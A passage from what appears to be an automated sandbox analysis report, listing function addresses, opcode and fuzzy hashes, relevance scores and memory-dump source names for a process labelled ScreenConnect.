                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d27ac22c45852d1744c498c4b30b71bf0b8154b58c774c269e122c110786c175
                                                                                                                                                                                                                                                        • Instruction ID: 621cc93fde115f88d7629f5b3dbd3900f173befef5a4c4b055a94359c977bae2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d27ac22c45852d1744c498c4b30b71bf0b8154b58c774c269e122c110786c175
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BA1DF31A28A454FD759EF2C9455AA9B7D2FF98710F4541BEE00EC73D3CE24AC068791
                                                                                                                                                                                                                                                        Function 00007FF7C01DE358 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0974553ea744ad624fbd70a5d4c3a6b66c2d360d793e7e0d110cde1d2f06a230
                                                                                                                                                                                                                                                        • Instruction ID: 2423c23d652a3188915698199480ff38128bb80fafee930dc2ea248f6a282bbe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0974553ea744ad624fbd70a5d4c3a6b66c2d360d793e7e0d110cde1d2f06a230
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DB1DE70A1861A8BEB5DFB18D8657F9B6A1FF94311F90017CE44ED33C2CE2C69468B91
                                                                                                                                                                                                                                                        Function 00007FF7C01DD397 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b505e8ef4cfad5ba83022abc52e7d952bc0adaeae05455076bdcd7e65e9fcfdb
                                                                                                                                                                                                                                                        • Instruction ID: e50c5adf13950213e2598d7c53ff32fbeb9e5db0b0a871cf405242da0c137415
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b505e8ef4cfad5ba83022abc52e7d952bc0adaeae05455076bdcd7e65e9fcfdb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8591EF30A1CA868FDB49EF2894556A9B7E1FF99310F5442BED04EC7293DE24F80687C1
                                                                                                                                                                                                                                                        Function 00007FF7C01D4A28 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0b8674e38bb71f917568e1efaf1ec8fb9fc1d0af691a28a56b549b8eb2e9da8d
                                                                                                                                                                                                                                                        • Instruction ID: 16628641913874f98b791a9432a1b631b1c0f836a6229ca7e5399149a3c1dcf0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b8674e38bb71f917568e1efaf1ec8fb9fc1d0af691a28a56b549b8eb2e9da8d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5181B131918A0A5BDF69EF14D4929B9F3A1FF64760B804229D44F87682DF24F91A8BD0
                                                                                                                                                                                                                                                        Function 00007FF7C01DB645 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 805ecd061d0454c146776dcf66571a067acf16cac3fb44a9974df180f9be6082
                                                                                                                                                                                                                                                        • Instruction ID: 63aa6e664ac81378cbc779bce669eabc3cac123f5d59cb46435913697b18f79e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 805ecd061d0454c146776dcf66571a067acf16cac3fb44a9974df180f9be6082
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33818170618A4DCFCF89EF18C4A4AA9B7A1FF59314B5046A9D41EC7396CB35F852CB80
                                                                                                                                                                                                                                                        Function 00007FF7C01E89C5 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ac9fba3e1caef376ff821979aca84c9c6646cec68d5fd1318874783e44db84ae
                                                                                                                                                                                                                                                        • Instruction ID: 9b3971b5df9d20053687477940f4ee992dd8496bf06d00f071139ce9a0aa2bdd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac9fba3e1caef376ff821979aca84c9c6646cec68d5fd1318874783e44db84ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1716270608A4D8FCF98DF18C494AA9B7B1FF99314B5446ADD41ECB396CB35E812CB80
                                                                                                                                                                                                                                                        Function 00007FF7C01D7C2D Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d06c22165ce40fceaff51937e84c1c5c7465e0bed8dbd6a3fa60be558066d5e
                                                                                                                                                                                                                                                        • Instruction ID: c583d7f4676093c6b409025ed03f5b5cbcbf668a3c3353ddd71dfdb552bac7bc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d06c22165ce40fceaff51937e84c1c5c7465e0bed8dbd6a3fa60be558066d5e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1516672A0CE4A8FD756AF6CA8501E9FBA1FF84724B44067AD05DC3252EF25B916C7C0
                                                                                                                                                                                                                                                        Function 00007FF7C01D8F88 Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0efc23397f32aec0cd2f6a63486eb627e2c1710109d789e0719ad8791c1c80d7
                                                                                                                                                                                                                                                        • Instruction ID: 61cc74e8496d12803bd49315af8bf19c0df751d968fa0730a40ab2e6f62b8ced
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0efc23397f32aec0cd2f6a63486eb627e2c1710109d789e0719ad8791c1c80d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B61B370A18E8A4FEB86EF2894696A8F7A1FF59324F44017DD04ED7293DF25B801C785
                                                                                                                                                                                                                                                        Function 00007FF7C01D57C6 Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 49bbcf9d59a1af8e99e4b8de922265ad4617c67781de563e03ed72e171bb596f
                                                                                                                                                                                                                                                        • Instruction ID: 59b1319c8c7f0ed170e612ed127bfa0e4c7ff3956ec05aba608b055e73102596
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49bbcf9d59a1af8e99e4b8de922265ad4617c67781de563e03ed72e171bb596f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F519F30618A5A8FDB99AF2C90517A9F392FFA8714F904279C40EC7286DF34F81687D1
                                                                                                                                                                                                                                                        Function 00007FF7C01DD452 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c51210dc7722791b61ee61a25c3dff7688ff9ac7fb987360d1e9b020e51cdd60
                                                                                                                                                                                                                                                        • Instruction ID: e37064fef880093bf94a1d60b13a051c54da24a205819699f92914edd1759c8c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c51210dc7722791b61ee61a25c3dff7688ff9ac7fb987360d1e9b020e51cdd60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B518E70618A4A8FDB48EF2CD455AA9B3E2FF98315B50427DD40EC7296DE24E85287C1
                                                                                                                                                                                                                                                        Function 00007FF7C01DAB04 Relevance: .2, Instructions: 176COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bdc129f35bba9c4c4d39ba153cf8944a826b595b7e3e54078781e31e469184bd
                                                                                                                                                                                                                                                        • Instruction ID: 3bb2b0b19c25c2a31f4a3c962dd96356e395e59cec519b318f054a6667f4c9f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdc129f35bba9c4c4d39ba153cf8944a826b595b7e3e54078781e31e469184bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A651C47071CE558FDB48EB1CA4556A9F7D1FF98720B5446AED40EC7286CE20F80187C5
                                                                                                                                                                                                                                                        Function 00007FF7C01D41E5 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4d328a81a670d0ebcb1d61a1f43e90f6eaeb96ff37b7e41ad66ad6be093538d1
                                                                                                                                                                                                                                                        • Instruction ID: 37990562b640c48e769890fe14059e098172a03ddcd36d8b913e6d5149c67bb1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d328a81a670d0ebcb1d61a1f43e90f6eaeb96ff37b7e41ad66ad6be093538d1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC513621A0DBC74FD756AB3D58652A8FBA0FF96610B4986FAC04CC71D3CA18B8098391
                                                                                                                                                                                                                                                        Function 00007FF7C01E7EC5 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3046daf05c06c1d90c99dee0dcfd2a6f26b90e9bf9c14c43daea7cf10e5d3cd3
                                                                                                                                                                                                                                                        • Instruction ID: 920514e7ab098c292eb144d57ef739082caba8fec94862f0e78b543c225b555a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3046daf05c06c1d90c99dee0dcfd2a6f26b90e9bf9c14c43daea7cf10e5d3cd3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22510531A0C94A4FEB64FA2894596BCF6D1EF94B30FA401B9D16DC72D2CA18BD4543E1
                                                                                                                                                                                                                                                        Function 00007FF7C01E69F5 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 69854c2150545e4727f423b40772c53c0556329e5c0de487bcbdce6350f05436
                                                                                                                                                                                                                                                        • Instruction ID: bb622192a94c205818ce81cc3bc17a2bb947793ab59d36d3a9dcad1430d95534
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69854c2150545e4727f423b40772c53c0556329e5c0de487bcbdce6350f05436
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41415C21A1DECA0FC745AB3C6428565BFE4FF96221B5442BFD44DC7293DE14BC058391
                                                                                                                                                                                                                                                        Function 00007FF7C01D2896 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 39fef2554f0c5f3374b09c367781b6120bd57fee64fb58820b86360bdc3f8ba0
                                                                                                                                                                                                                                                        • Instruction ID: b35662357ca7920492a762f18d45bc0b3f19772409f0675872ea7bb0e114aef6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39fef2554f0c5f3374b09c367781b6120bd57fee64fb58820b86360bdc3f8ba0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87518CB0609A498FCB89EF28C465B95B7A1FF58314B0445ACD49ECB697CB31F816CBC4
                                                                                                                                                                                                                                                        Function 00007FF7C01E878D Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 419ef184fa17589b20aa3d1c3412195ef17206adf38e1988099a38bb8a8a2517
                                                                                                                                                                                                                                                        • Instruction ID: c79598b2955444ed69eb6adbd86278f85df2e781558732be708ee8d9a7e89b26
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 419ef184fa17589b20aa3d1c3412195ef17206adf38e1988099a38bb8a8a2517
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7741D731A08A1D8FDB54EF68A4986E9FBE1FF59315B4442AAD40DD7352CF31B846CB80
                                                                                                                                                                                                                                                        Function 00007FF7C01E8C75 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 68a5541fab9269aca192f54c34c18ef8d2ce793b5a6b9b250000e94b1f1bb55e
                                                                                                                                                                                                                                                        • Instruction ID: 12fd9615a6c71ee374616a05a06cb36ac942d5862d23787129a3ca8da62ea44c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68a5541fab9269aca192f54c34c18ef8d2ce793b5a6b9b250000e94b1f1bb55e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2519470618A498FCB89DF28D8A4AA977A1FF59314B54429DE46EC73D2CB31E812CB41
                                                                                                                                                                                                                                                        Function 00007FF7C01E57CD Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: de6c4c973c3c9187305e85c7f326210c635bf970a735232fcdd5253bc46a90ad
                                                                                                                                                                                                                                                        • Instruction ID: fa7cc0b26daf11c0922ba2b7d7ec9d04adacc8d332c3e8ea0d15d2a8b3dce6c0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de6c4c973c3c9187305e85c7f326210c635bf970a735232fcdd5253bc46a90ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D441D670B08E0D8FDB94AF29A49CABCFBE1FF69711B44016AD559C7392DF24A801C791
                                                                                                                                                                                                                                                        Function 00007FF7C01D9C91 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 690d966a13e55519a44a44e8d9a8f7beb51d27ff4f33ee88d0db8e5e59651bb8
                                                                                                                                                                                                                                                        • Instruction ID: 576d85ca82a79ee2eee6061da9f0d0ffad8c1064788c2b0bee25deb119aeffb6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690d966a13e55519a44a44e8d9a8f7beb51d27ff4f33ee88d0db8e5e59651bb8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1641B230A18E494FE785FB2C94567B9F7E2FF88710F44427AD04EC3692DE28B8428391
                                                                                                                                                                                                                                                        Function 00007FF7C01DB935 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 503f45f67e4fefc5cecb65c3a4f10ed8588e08ce3be10f32d0e595233316396b
                                                                                                                                                                                                                                                        • Instruction ID: aef1319d6a675949425dd662c796dc92a478660e5c5a5156252bf1d04ed9bd91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 503f45f67e4fefc5cecb65c3a4f10ed8588e08ce3be10f32d0e595233316396b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8741617021CB898FCB89DF28C8A4AA577A1FF59314B54069DE45EC73D2CB35E852CB41
                                                                                                                                                                                                                                                        Function 00007FF7C01DBEB9 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d8062cbb88d495d8217486f17735cbbd947b3b97c8e1ff2f98b8a3f4b328bdc6
                                                                                                                                                                                                                                                        • Instruction ID: 3e2407d54927c458e28488ebcaf76eba3b22583563b46660615539ccf7d609e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8062cbb88d495d8217486f17735cbbd947b3b97c8e1ff2f98b8a3f4b328bdc6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E31BB3250CB4C5FE745DE28EC865B5B7C0EB85230B84027FD44EC7252DE25F9428790
                                                                                                                                                                                                                                                        Function 00007FF7C01E87CD Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 466ffb9c0d95a22ce07d2fbca628633ce350d260d32aee55cd96b5b87c2878ea
                                                                                                                                                                                                                                                        • Instruction ID: 628b143ae3c742ce68157b4d1372ada663b165cabf297db2666a209b6efab6b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 466ffb9c0d95a22ce07d2fbca628633ce350d260d32aee55cd96b5b87c2878ea
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D941B331608A0D8FCF94EF68E498AADFBA1FF59315B4442AAD40DD7352DF31A805CB81
                                                                                                                                                                                                                                                        Function 00007FF7C01E6F44 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c6a1e00a4d108575f0c048775731f4c2cedf9e0cc6006236b109e7d3e3ccf1d6
                                                                                                                                                                                                                                                        • Instruction ID: 284d03e78d961abdb81b637e06f31ae4b9282b47674c0e5e53b1d366c84bbf6e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6a1e00a4d108575f0c048775731f4c2cedf9e0cc6006236b109e7d3e3ccf1d6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04418674208A49CFDF88EF18D8A47A9B7A1FF59318B50059DD46AC7386DB31E853CB40
                                                                                                                                                                                                                                                        Function 00007FF7C01D000A Relevance: .1, Instructions: 119COMMON
